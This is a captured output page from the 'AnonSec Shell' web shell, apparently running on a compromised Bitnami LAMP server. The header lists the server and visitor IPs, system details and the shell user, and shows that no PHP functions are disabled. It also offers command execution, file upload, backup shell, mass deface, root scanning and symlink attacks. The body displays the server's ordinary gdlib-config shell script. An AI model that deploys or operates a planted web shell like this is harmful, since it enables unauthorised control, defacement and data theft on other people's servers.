AnonSec Shell
Server IP : 52.91.253.208  /  Your IP : 3.129.194.106   [ Reverse IP ]
Web Server : Apache
System : Linux ip-172-26-9-9 4.19.0-25-cloud-amd64 #1 SMP Debian 4.19.289-1 (2023-07-24) x86_64
User : daemon ( 1)
PHP Version : 7.3.18
Disable Function : NONE
Domains : 3 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /opt/bitnami/common/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /opt/bitnami/common/bin/gdlib-config
#!/bin/sh
#
# Return information about the local GD library installation
#
# Modeled after pdflib-config

# installation directories
prefix=/opt/bitnami/common
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${prefix}/include
bindir=${exec_prefix}/bin

usage()
{
	cat <<EOF
Print information on GD library's version, configuration, and use.
Usage: gdlib-config [options]
Options:
	--libdir          # directory where GD library is installed
	--includedir      # directory where GD library headers are installed
	--version         # complete GD library version string
	--majorversion    # GD library major version number
	--minorversion    # GD library minor version number
	--revision        # GD library revision version number
	--ldflags         # options required for linking against GD library
	--libs            # libs required for linking against GD library
	--cflags          # options required for compiling GD library apps
	--includes        # same as --cflags
	--features        # lists optional features compiled into gd, separated
                          # by spaces. Currently (as of 2.0.26) the optional
                          # features are GD_PNG, GD_JPEG, GD_XPM, and
                          # GD_FREETYPE. When these features are reported by
                          # --features, it is safe to include calls to the
                          # related functions in your code.
	--all             # print a summary of all GD library configure options
EOF
	exit $1
}

if test $# -eq 0; then
	usage 1 1>&2
fi

while test $# -gt 0; do
    case "$1" in
    -*=*) optarg=`echo "$1" | sed 's/[-_a-zA-Z0-9]*=//'` ;;
    *) optarg= ;;
    esac

    case $1 in
    --libdir)
	echo $libdir
	;;
    --includedir)
	echo $includedir
	;;
    --version)
	echo 2.0.35
	;;
    --majorversion)
	echo 2
	;;
    --minorversion)
	echo 0
	;;
    --revision)
	echo 35
	;;
    --ldflags)
	echo  -L/opt/bitnami/common/lib  -L/opt/bitnami/common/lib -L/bitnami/lamp73stack-linux-x64/output/sqlite/lib -L/bitnami/lamp73stack-linux-x64/output/mysql/include -L/opt/bitnami/common/lib
	;;
    --libs)
	echo -ljpeg -lfreetype -lpng -lz -lm  -liconv
	;;
    --cflags|--includes)
	echo -I${prefix}/include
	;;
    --features)
	echo GD_JPEG GD_FREETYPE GD_PNG GD_GIF GD_GIFANIM GD_OPENPOLYGON
	;;
    --all)
	echo "GD library  2.0.35"
	echo "includedir: $includedir"
	echo "cflags:     -I${prefix}/include"
	echo "ldflags:     -L/opt/bitnami/common/lib  -L/opt/bitnami/common/lib -L/bitnami/lamp73stack-linux-x64/output/sqlite/lib -L/bitnami/lamp73stack-linux-x64/output/mysql/include -L/opt/bitnami/common/lib"
	echo "libs:       -ljpeg -lfreetype -lpng -lz -lm  -liconv"
	echo "libdir:     $libdir"
	echo "features:   GD_JPEG GD_FREETYPE GD_PNG GD_GIF GD_GIFANIM GD_OPENPOLYGON"
	;;
    *)
	usage 1 1>&2
	;;
    esac
    shift
done

Anon7 - 2022
AnonSec Team